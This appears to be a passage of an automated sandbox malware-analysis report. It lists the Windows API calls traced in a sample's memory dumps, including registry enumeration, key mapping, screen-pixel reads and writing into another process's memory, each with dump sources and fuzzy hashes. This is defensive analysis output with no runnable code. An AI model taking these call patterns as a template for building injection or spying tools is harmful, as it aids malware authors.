                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00C50980
                                                                                                                                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C509A9
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C509EC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00C509F9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4046560759-0
                                                                                                                                                                                                              • Opcode ID: ba1723bfd367513cef560c75a9a5c8d0a691beb8874796c688e1d7e8c48597c1
                                                                                                                                                                                                              • Instruction ID: a066c91684771edb50a8a960bd9848c13bc8bb0c40826688895c2df1b1787728
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba1723bfd367513cef560c75a9a5c8d0a691beb8874796c688e1d7e8c48597c1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70518C31208244AFD710EF65C885E6FBBE9FF84310F24495DF999872A2DB31E949CB52
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00C2C34E
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C2C35F
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C2C366
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00C2C36E
                                                                                                                                                                                                              • MulDiv.KERNEL32 ref: 00C2C385
                                                                                                                                                                                                              • MulDiv.KERNEL32 ref: 00C2C397
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CapsDevice$Release
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1035833867-0
                                                                                                                                                                                                              • Opcode ID: fa37572ff66303ffe048519a0461d400fceab7ea3560ea833fe8c791d8226cb3
                                                                                                                                                                                                              • Instruction ID: 8b5b1cc2fc44a21beacfa860047bed461583c7ac4320e455612daf4c8c66c67a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa37572ff66303ffe048519a0461d400fceab7ea3560ea833fe8c791d8226cb3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20014475E04219BBEF209BA69C49B9FBFB8EB48751F104065FE04B7290D6B09D10CFA0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BD16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00BD1729
                                                                                                                                                                                                                • Part of subcall function 00BD16CF: SelectObject.GDI32(?,00000000), ref: 00BD1738
                                                                                                                                                                                                                • Part of subcall function 00BD16CF: BeginPath.GDI32(?), ref: 00BD174F
                                                                                                                                                                                                                • Part of subcall function 00BD16CF: SelectObject.GDI32(?,00000000), ref: 00BD1778
                                                                                                                                                                                                              • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00C5C57C
                                                                                                                                                                                                              • LineTo.GDI32(00000000,00000003,?), ref: 00C5C590
                                                                                                                                                                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00C5C59E
                                                                                                                                                                                                              • LineTo.GDI32(00000000,00000000,?), ref: 00C5C5AE
                                                                                                                                                                                                              • EndPath.GDI32(00000000), ref: 00C5C5BE
                                                                                                                                                                                                              • StrokePath.GDI32(00000000), ref: 00C5C5CE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 43455801-0
                                                                                                                                                                                                              • Opcode ID: 1262b37649de513d335d441fc396176896b8aa738c1e12fe0a8d4600b2726c58
                                                                                                                                                                                                              • Instruction ID: 531e9cba390c7736bc16d92180747fe2ee74e6a8e698c6494ccb4d51a69c7aa3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1262b37649de513d335d441fc396176896b8aa738c1e12fe0a8d4600b2726c58
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3110C7600010CBFDB129F91DC88F9E7FADEB04354F148051F9195A1A0D7B1AE55DBA0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BF07EC
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00BF07F4
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BF07FF
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BF080A
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00BF0812
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BF081A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Virtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4278518827-0
                                                                                                                                                                                                              • Opcode ID: c8071bf48434589998bc6544bd59768767ef922413ef1c3d103fdb281ac17d7d
                                                                                                                                                                                                              • Instruction ID: a971ddc40e628c32db86b69d5020b41a0d3dc36c72ca410942bf60a69e970e98
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8071bf48434589998bc6544bd59768767ef922413ef1c3d103fdb281ac17d7d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B50148B09017597DE3008F5A8C85B56FEA8FF59354F00411BA15847941C7F5A864CBE5
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00C32318
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BuffCharUpper
                                                                                                                                                                                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                                                                                                              • API String ID: 3964851224-769500911
                                                                                                                                                                                                              • Opcode ID: 54305ea3e063ee3f11e8b7dd1a5af3aabafe3ab25e6e1725850b7dc59fca046d
                                                                                                                                                                                                              • Instruction ID: 8ab3d2d838a613ef40544a25814216c4dfdb72c5480cdc2e391cda8fd11fda8a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54305ea3e063ee3f11e8b7dd1a5af3aabafe3ab25e6e1725850b7dc59fca046d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD11707495011C9BCF00EF94D8909FEB3B8FF15304F2044A8D82067262DB325E0ACB40
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BE1A36: _memmove.LIBCMT ref: 00BE1A77
                                                                                                                                                                                                                • Part of subcall function 00C5147A: CharUpperBuffW.USER32(?,?), ref: 00C51491
                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C5075D
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C5079C
                                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C507E3
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00C5080F
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00C5081C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3440857362-0
                                                                                                                                                                                                              • Opcode ID: 31306bac279f0b08ff8fc6919554e6eb424b43cc1c3f94714c6ff14640132e93
                                                                                                                                                                                                              • Instruction ID: c943704c9e3d0a72808e273d24f9ee52b2a639e8b9e89054eb4fd694e3941479
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 31306bac279f0b08ff8fc6919554e6eb424b43cc1c3f94714c6ff14640132e93
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A516D31208204AFC714EF64C881F6EB7E9FF88305F24895DF99697292DB30E948CB56
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 7a7e79029fc1bab0e60daa10ff7449255631ea6e260c41a91b7b58b9dc7b8196
                                                                                                                                                                                                              • Instruction ID: 15d82762b1d138192f729e42ece7475bedf56ac8427dc10389d7dd8dbe5aa6d6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a7e79029fc1bab0e60daa10ff7449255631ea6e260c41a91b7b58b9dc7b8196
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4941D339900104AFD720DB26CC48FAABBB4EB0D392F140365FC26A72D1D7709E85DA65
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4210589936-0
                                                                                                                                                                                                              • Opcode ID: 3de46932888d6e11fb43de61747bae69f4afbc760c6d5f661c36540d81520814
                                                                                                                                                                                                              • Instruction ID: 766f66cb7aca3b41f72774d8591c94f0a4dcb2a5b02c02c218c5f01177446157
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3de46932888d6e11fb43de61747bae69f4afbc760c6d5f661c36540d81520814
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9341A535504109FFDF299F65C884AE9FBB4FB15324F204356F828922E0D730AD90DB90
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindow.USER32(00000000), ref: 00C46159
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00C46170
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00C461AC
                                                                                                                                                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 00C461B8
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 00C461F3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4156661090-0
                                                                                                                                                                                                              • Opcode ID: ddba513c0613d64aa5f998d89635dfa721ef705bf345c4e6be58e8c287301ce6
                                                                                                                                                                                                              • Instruction ID: c4d55538b7945ed898b266a03073cbd2d063febd841d5303b170b3ec665c0b8d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ddba513c0613d64aa5f998d89635dfa721ef705bf345c4e6be58e8c287301ce6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34219F75A00204AFD714EF65DC84B9EBBF9EF89311F148469F94A97362DA70AC00DB90
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BF0FE6: std::exception::exception.LIBCMT ref: 00BF101C
                                                                                                                                                                                                                • Part of subcall function 00BF0FE6: __CxxThrowException@8.LIBCMT ref: 00BF1031
                                                                                                                                                                                                                • Part of subcall function 00BE1A36: _memmove.LIBCMT ref: 00BE1A77
                                                                                                                                                                                                                • Part of subcall function 00BE1680: _memmove.LIBCMT ref: 00BE16DB
                                                                                                                                                                                                              • __swprintf.LIBCMT ref: 00BDE598
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00BDE431
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                                                                              • API String ID: 1943609520-557222456
                                                                                                                                                                                                              • Opcode ID: ea082b3d29a452b7b7462efc67f38e0126b9be28c9b711768c81f738b9e0a6b9
                                                                                                                                                                                                              • Instruction ID: fa9c1bd8d935d570cdfdaebfc7616a55973b00c89aba4b63fe304e1f1ed9fbe6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea082b3d29a452b7b7462efc67f38e0126b9be28c9b711768c81f738b9e0a6b9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50919C711146419FC714FF28C895C6EB7E8EF95304F10099EF5A69B2A1EB30EE44CB92
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: #$+
                                                                                                                                                                                                              • API String ID: 0-2552117581
                                                                                                                                                                                                              • Opcode ID: 2137f4a8070c390a61e09747d51f3321e34724fe031f9f699e39bbcc5ca95426
                                                                                                                                                                                                              • Instruction ID: d1feeda70ff6c3a4aa27557dc86fa154af9185d17a52df7f7f1bd907c2dabde0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2137f4a8070c390a61e09747d51f3321e34724fe031f9f699e39bbcc5ca95426
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C05113755002A9CFDB25EF28D480AFA7BE4EF55310F244095EDA2AB6E1D730AD46CB70
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00C31CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C29E4E,?,?,00000034,00000800,?,00000034), ref: 00C31CE5
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C2A3F7
                                                                                                                                                                                                                • Part of subcall function 00C31C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C29E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00C31CB0
                                                                                                                                                                                                                • Part of subcall function 00C31BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00C31C08
                                                                                                                                                                                                                • Part of subcall function 00C31BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C29E12,00000034,?,?,00001004,00000000,00000000), ref: 00C31C18
                                                                                                                                                                                                                • Part of subcall function 00C31BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C29E12,00000034,?,?,00001004,00000000,00000000), ref: 00C31C2E
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C2A464
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C2A4B1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                              • API String ID: 4150878124-2766056989
                                                                                                                                                                                                              • Opcode ID: d74ee9c1a6a83f5dc15080734f5299f1b8bab6ae59a31e4f680ea70012aa259d
                                                                                                                                                                                                              • Instruction ID: 593c3a5b5bade4da7583a6950e078f86b07433cceaddf719c57afbf79813883a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d74ee9c1a6a83f5dc15080734f5299f1b8bab6ae59a31e4f680ea70012aa259d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07414C7290121CAFCB10DFA4DD85BDEB7B8EB45300F144095FA55B7180DA70AF45DBA1
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C5826F
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C5827D
                                                                                                                                                                                                              • DestroyWindow.USER32 ref: 00C58284
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                              • String ID: msctls_updown32
                                                                                                                                                                                                              • API String ID: 4014797782-2298589950
                                                                                                                                                                                                              • Opcode ID: c1f63ece21240b8a281990753bc278321605b600138f8c6555e8ded81354febd
                                                                                                                                                                                                              • Instruction ID: 28169217994adea408b684ec9be1524ab9a7695d6da3b20f1d4e591958a96a06
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c1f63ece21240b8a281990753bc278321605b600138f8c6555e8ded81354febd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C21B0B5604208AFDB10DF58CCC5E6B3BEDEB59394B040159FA11AB3A1CB70EC55CBA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00C4C6E7
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW,?,00C1027A,?), ref: 00C4C6F9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                                                                              • API String ID: 2574300362-1816364905
                                                                                                                                                                                                              • Opcode ID: 6c79317112603a89ba581121addbe7bd2e6b9c1e9955b71ddfd4268861d856a9
                                                                                                                                                                                                              • Instruction ID: a421c978c6c76dfd35d1b923b64d370959725229d86943bbd84cb3267620dbf5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c79317112603a89ba581121addbe7bd2e6b9c1e9955b71ddfd4268861d856a9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75E012795117138FDB705B67CC89B5B76E4FF05755B608829E995E2260D7B0DC40CF10
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000003.2166933112.0000000003C00000.00000004.00000001.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000003.2165074899.0000000003CDA000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000003.2166177808.0000000003CDD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $$+$-$0$0
                                                                                                                                                                                                              • API String ID: 0-4042548909
                                                                                                                                                                                                              • Opcode ID: da8d3ab3432ba93097c6bc775de03b17d457751da0abb236245142e9d455c8df
